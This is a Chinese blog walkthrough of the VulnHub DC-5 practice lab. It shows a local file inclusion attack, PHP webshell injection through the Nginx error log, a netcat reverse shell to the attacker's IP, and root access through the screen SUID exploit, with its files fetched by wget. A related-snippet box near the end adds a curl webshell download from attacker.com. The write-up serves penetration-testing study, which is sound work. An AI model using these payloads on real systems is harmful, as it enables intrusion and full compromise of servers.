DC-5靶场下载及渗透实战详细过程(DC靶场系列)

已于 2022-07-30 22:23:32 修改
阅读量2.7k 收藏 14
点赞数 7
分类专栏: VulnHub之DC系列靶场机 文章标签: linux web安全 web渗透 渗透测试
于 2022-07-30 22:17:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/126062342
版权

目录

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

4. 页面信息探测

二. 渗透过程

1. 寻找包含文件的参数

2. Nginx日志文件包含

3. 反弹shell 

4. Linux提权

5. 找查flag

三. 收获总结

1. Nginx日志包含

2. 值得注意的事项

DC-5靶场下载地址https://www.five86.com/downloads/DC-5.zip

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

扫描出了一个特别的

4. 页面信息探测

主页面没发现有啥,只知道用的中间件为Nginx

而这个页面,每次刷新版权标识年份都会随机变化

 这个页面也是随机变化,出现这种情况,可能是因为传参为空而默认包涵了本地下的footer.php文件,所以考虑到本地文件包含漏洞,当然也可能只是PHP脚本随机的结果

二. 渗透过程

1. 寻找包含文件的参数

为了验证文件包含的猜想,这里利用burpsuite爆破配合参数fuzz拆解

fuzz连接,https://github.com/TheKingOfDuck/fuzzDicts

我这边也上传在csdn了,0积分免费下载

web渗透通用fuzz字典(小而精)-网络安全文档类资源-CSDN文库

burpsuite抓包

设置好Positions爆破参数

加载刚才下载的参数fuzz,开始爆破

爆破得到file参数

2. Nginx日志文件包含

先查看一下Nginx的配置,构造payload

http://ip/thankyou.php?file=/etc/nginx/nginx.conf

开启了访问日志(access_log)和错误日志(error_log),这里我们看一下错误日志

http://ip/thankyou.php?file=/var/log/nginx/error.log

 得到了thankyou.php的目录,不难发现,传参错误的时候,会自动记录URL还有referer头在错误日志里,构造payload

/thankyou.php?mumua=<?php system($_GET[1])?>

这里记得用burpsuite重复器抓包发送,用浏览器传参会自动将<>转换成URL编码导致php执行失败

接着尝试一下命令执行

/thankyou.php?file=/var/log/nginx/error.log&1=whoami

任意命令执行成功!!!

3. 反弹shell 

构造payload

/thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.120.129 6666

反弹shell成功,升级为交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

4. Linux提权

find / -perm -4000 -print 2>/dev/null

可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞

searchsploit screen 4

将文件复制到桌面

cp  /usr/share/exploitdb/exploits/linux/local/41154.sh /root/桌面/exp.sh

开启http服务

python -m http.server 8888

接下来,我们以文本的形式打开exp.sh文件(因为靶机没有对应的命令,只能手工提取命令了)

根据提示,在桌面创建两个c文件

保存之后,在桌面打开终端,用gcc编译c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容

将1到36行的内容全部删除并保存,留下cd /etc后面的命令,接着在/tmp目录下,下载这三个文件

cd /tmp

wget 192.168.120.129:8888/exp.sh

wget 192.168.120.129:8888/libhax.so

wget 192.168.120.129:8888/rootshell

文件下载完后,赋予exp文件权限并执行exp.sh

chmod 777 exp.sh

./exp.sh

提权成功

5. 找查flag

find / -name *flag.*

tac /root/this*

通过成功!!!

三. 收获总结

1. Nginx日志包含

①先查看配置文件,查看开启的日志

/etc/nginx/nginx.conf

②错误日志跟访问日志目录

/var/log/nginx/access.log
#访问日志
/var/log/nginx/error.log
#错误日志

③通过分析日志,包含木马

记得一定要用burpsuite进行测试,用浏览器会导致大于小于号被URL编码而无法正确识别PHP

2. 值得注意的事项

当目标靶机没有相关的命令时,可以自己分析sh文件,现在kali上完成一些重要的操作,然后手工提权

金 帛
关注
  • 7
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
vuInhub靶场实战系列-DC-5实战
05-27
vuInhub靶场实战系列-DC-5实战
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5639
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5靶机渗透测试过程(个人学习)
m0_59028058的博客
05-27 1896
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4863
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 6907
DC-5靶机渗透测试详细教程
DC靶场系列--DC1
BGiscool的博客
06-28 4855
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1218
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC-9靶场下载渗透实战详细过程DC靶场系列)
金 帛的博客
08-09 4662
dc-9靶场详细渗透过程
DC-7靶场下载渗透实战详细过程DC靶场系列)
金 帛的博客
08-08 2841
dc-7靶场详细渗透过程
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2703
最近闲着冲浪玩发现了DC系列漏洞靶场下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
DC-5靶机
mlws1900的博客
03-25 749
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
DC-1靶场搭建及渗透实战详细过程DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
2022-渗透测试-DC靶场下载、安装与访问
保持微笑的博客
02-03 4874
目录 1.DC靶场下载 2.DC靶场的安装 3.DC靶场的访问 1.DC靶场下载 下载链接如下 Vulnerable By Design - Search: dc (Page 2) ~ VulnHubhttps://www.vulnhub.com/?page=2&q=dcDC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。 2.DC靶场的安装 以DC-1为例,将文件解压。 打开虚拟机,选择解压好的文件 导入虚拟机 ...
DC-1渗透靶场实战速通版
saber的博客
12-01 884
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值